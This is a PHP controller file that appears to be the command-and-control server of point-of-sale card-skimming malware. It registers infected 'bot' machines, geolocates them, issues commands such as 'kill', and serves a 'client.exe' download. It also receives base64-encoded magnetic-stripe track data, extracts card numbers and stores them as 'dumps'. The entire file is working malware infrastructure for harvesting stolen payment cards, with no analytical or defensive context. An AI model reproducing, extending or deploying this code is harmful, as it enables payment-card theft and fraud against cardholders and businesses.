<?php

class PostController extends Controller
{
	public function actionIndex()
	{
		if(!isset($_POST["mac"]))
			die();
		$mac = $_POST["mac"];
		$uid = 1;
		//get bot info
		$b_attr = array("mac"=>$mac);
		$bot = Bot::model()->findByAttributes($b_attr);

		//get country info
		$ip_nums = explode(".",$_SERVER["REMOTE_ADDR"]);
		$ip_num = ($ip_nums[0] * 16777216) + ($ip_nums[1] * 65536) + ($ip_nums[2] * 256) + ($ip_nums[3]);

		$c_attr =new CDbCriteria;
		$c_attr->together = true;
		$c_attr->with = array('range');
		$c_attr->compare('range.start_num<',$ip_num);
		$c_attr->compare('range.end_num>',$ip_num);

		$country = Country::model()->find($c_attr);
		$cmd=false;
		if($bot==null){
			$bot = new Bot();
			$bot->user_id=$uid;
			$bot->country_id=$country==null?252:$country->id;
			$bot->ip=$_SERVER["REMOTE_ADDR"];
			$bot->mac=$mac;
			$bot->last_active=date("Y-m-d H:i:s");
			$bot->created=date("Y-m-d H:i:s");
			$bot->archived=0;
			$bot->save();
		}else{
			$cmd = $bot->getCommand();
			if($cmd["text"]!="kill")
				$bot->archived=0;

			$bot->country_id=$country==null?252:$country->id;
			$bot->ip=$_SERVER["REMOTE_ADDR"];
			$bot->last_active=date("Y-m-d H:i:s");
			$bot->save();
		}

		if($cmd)
			print $cmd["text"];
		if($cmd["text"]!="kill"){
			if(isset($_POST["t2"])&&strlen($_POST["t2"])>0){
				$t2 = base64_decode($_POST["t2"]);
				$track2=array_unique(explode("|",$t2));
				$this->clear_array($track2);
				if(count($track2)>0){
					foreach($track2 as $track){
						//Get card number
						$cc_num = $this->cc_num_from_track($track);
						$card = Card::model()->findByAttributes(array("number"=>$cc_num));

						if(!$card){
							$card = new Card();
							$card->number = $cc_num;
							$card->created = date("Y-m-d H:i:s");
							$card->save();
						}

						$dump = Dump::model()->findByAttributes(array("card_id"=>$card->id));
						if(!$dump){
							$dump = new Dump();
							$dump->bot_id=$bot->id;
							$dump->card_id=$card->id;
							$dump->created = date("Y-m-d H:i:s");
							$dump->archived = 0;
							$dump->save();
						}elseif($dump->archived==1){
							$dump->archived=0;
							$dump->save();
						}
						
						$this->process_track($dump,$track,2);
					}
				}
			}

			if(isset($_POST["t1"])&&strlen($_POST["t1"])>0){
				$t1 = base64_decode($_POST["t1"]);
				$track1=array_unique(explode("|",$t1));
				$this->clear_array($track1);
				if(count($track1)>0){
					foreach($track1 as $track){
						//Get card number
						$cc_num = $this->cc_num_from_track($track);
						$card = Card::model()->findByAttributes(array("number"=>$cc_num));

						if(!$card){
							$card = new Card();
							$card->number = $cc_num;
							$card->created = date("Y-m-d H:i:s");
							$card->save();
						}

						$dump = Dump::model()->findByAttributes(array("card_id"=>$card->id));
						if(!$dump){
							$dump = new Dump();
							$dump->bot_id=$bot->id;
							$dump->card_id=$card->id;
							$dump->created = date("Y-m-d H:i:s");
							$dump->archived = 0;
							$dump->save();
						}elseif($dump->archived==1){
							$dump->archived=0;
							$dump->save();
						}

						$this->process_track($dump,$track,1);
					}
				}
			}
		}

	}
	public function actionEcho(){
		print "up";
	}
	public function actionDownload(){
		$file = array();
		$file["directory"] = "clients/";
		$file["name"] = scandir($file["directory"]);
		$file["name"] = $file["directory"].end($file["name"]);
		$file["exists"] = file_exists($file["name"]);
		if($file["exists"]){
			$file["size"] = round(filesize($file["name"])/1024);
			$file["date"] = date("d F Y",filemtime($file["name"]));
			header("Content-type: application/octet-stream");
			header('Content-Disposition: attachment; filename="client.exe"');
			echo file_get_contents($file["name"]);
		}
	}
	private function clear_array(&$array){
		foreach($array as $key => $value) {
			if(is_array($value)) {
				foreach($value as $key2 => $value2) {
					if(empty($value2)) 
						unset($array[ $key ][ $key2 ]);
				}
			}
			if( empty($array[$key]))
				unset($array[$key]);
		}
	}
	private function cc_num_from_track($track){
		$data = explode("^",$track);
		$data = explode("=",$data[0]);
		$data = str_replace("%","",str_replace("B","",str_replace(";","",$data[0])));
		return $data;
	}
	private function process_track($dump,$data,$type){
		$track = Track::model()->findByAttributes(array("text"=>$data,"type"=>$type));
		if(!$track){
			$track = new Track();
			$track->type=$type;
			$track->text=$data;
			$track->dump_id=$dump->id;
			$track->save();
		}
	}
}

?>
